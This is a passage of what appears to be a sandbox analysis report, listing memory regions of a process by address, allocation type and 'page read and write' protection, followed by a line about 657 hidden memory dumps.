page read and write
|
||
|
24824000
|
direct allocation
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
287A3CE0000
|
heap
|
page read and write
|
||
|
76D3000
|
heap
|
page read and write
|
||
|
15C2E8DC000
|
trusted library allocation
|
page read and write
|
||
|
287A1D90000
|
heap
|
page read and write
|
||
|
143C7E7B000
|
heap
|
page read and write
|
||
|
2481C000
|
direct allocation
|
page read and write
|
||
|
31BE000
|
stack
|
page read and write
|
There are 657 hidden memdumps, click here to show them.